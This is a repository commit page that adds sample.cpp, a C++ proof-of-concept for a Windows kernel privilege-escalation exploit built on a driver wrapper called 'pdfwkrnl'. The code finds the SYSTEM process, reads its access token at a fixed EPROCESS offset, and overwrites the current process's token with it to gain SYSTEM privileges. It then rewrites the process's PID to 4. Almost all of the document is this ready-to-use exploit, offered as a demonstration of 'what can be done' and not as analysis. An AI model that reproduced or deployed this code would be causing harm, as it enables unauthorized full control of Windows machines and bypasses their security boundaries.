admin/pdfwkrnl-exploit
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create sample.cpp

Browse Source 
add a sample of what can be done with this,
This commit is contained in:
dpcpointer
2025-06-03 19:07:00 -06:00
committed by GitHub
parent 5d793d7097
commit bfc85219bb
1 changed files with 109 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

109
sample.cpp Normal file
View File

@@ -0,0 +1,109 @@
#include "PdFwKrnl.h"
typedef struct _EX_FAST_REF {
union {
VOID* Object;
ULONGLONG RefCnt : 4;
ULONGLONG Value;
};
}EX_FAST_REF, *PEX_FAST_REF;
int main(void) {
if (!pdfwkrnl::attach()) {
printf(STR("failed to attach to driver \n"));
return -1;
}
PVOID* ntoskrnl_object = nullptr;
PVOID* current_process_object = nullptr;
uint64_t current_process_pid = GetCurrentProcessId();
uint64_t ntoskrnl_pid = 4;
EX_FAST_REF ntoskrnl_token{};
EX_FAST_REF current_process_token{};
printf(STR("starting exploit \n"));
printf(STR("getting ntoskrnl object \n"));
pdfwkrnl::call_kernel_function<NTSTATUS>(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)4, &ntoskrnl_object);
if (!ntoskrnl_object) {
printf(STR("failed to obtain ntoskrnl object \n"));
return pdfwkrnl::detach();
}
printf(STR("obtained ntoskrnl object @ %p \n"), ntoskrnl_object);
printf(STR("getting ntoskrnl token \n"));
ntoskrnl_token = pdfwkrnl::read<EX_FAST_REF>((uint64_t)ntoskrnl_object + 0x4b8);
if (!ntoskrnl_token.Object) {
printf(STR("failed to obtain ntoskrnl token \n"));
return pdfwkrnl::detach();
}
printf(STR("obtained ntoskrnl token | object @ %p \n"), ntoskrnl_token.Object);
printf(STR("current process pid %d \n"), current_process_pid);
printf(STR("ntoskrnl pid %d \n"), 4);
printf(STR("getting current process object \n"));
pdfwkrnl::call_kernel_function<NTSTATUS>(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)current_process_pid, &current_process_object);
if (!current_process_object) {
printf(STR("failed to obtain current process object \n"));
return pdfwkrnl::detach();
}
printf(STR("obtained current process object @ %p \n"), current_process_object);
printf(STR("getting current process token \n"));
current_process_token = pdfwkrnl::read<EX_FAST_REF>((uint64_t)current_process_object + 0x4b8);
if (!current_process_token.Object) {
printf(STR("failed getting current process token \n"));
return pdfwkrnl::detach();
}
printf(STR("overwriting current process token with ntoskrnl's token \n"));
if (!pdfwkrnl::write((uint64_t)current_process_object + 0x4b8, &ntoskrnl_token, sizeof(EX_FAST_REF))) {
printf(STR("failed overwriting current process token \n"));
return pdfwkrnl::detach();
}
printf(STR("checking if overwrite was success \n"));
EX_FAST_REF current_process_token_temp = pdfwkrnl::read<EX_FAST_REF>((uint64_t)current_process_object + 0x4b8);
if (current_process_token_temp.Object != ntoskrnl_token.Object) {
printf(STR("failed overwriting current process token \n"));
return pdfwkrnl::detach();
}
printf(STR("token was successfully overwriten \n"));
printf(STR("overwriting current process's pid to ntoskrnl's \n"));
if (!pdfwkrnl::write((uint64_t)current_process_object + 0x440, &ntoskrnl_pid, sizeof(uint64_t))) {
printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
return pdfwkrnl::detach();
}
printf(STR("checking if current process's pid was overwriten \n"));
if (pdfwkrnl::read<uint64_t>((uint64_t)current_process_object + 0x440) != ntoskrnl_pid) {
printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
return pdfwkrnl::detach();
}
printf(STR("pid was successfully overwriten \n"));
printf(STR("hello to two ntoskrnl's lol \n"));
printf(STR("exploit complete bye (: \n"));
printf(STR("enter to exit \n"));
getchar();
return pdfwkrnl::detach();
}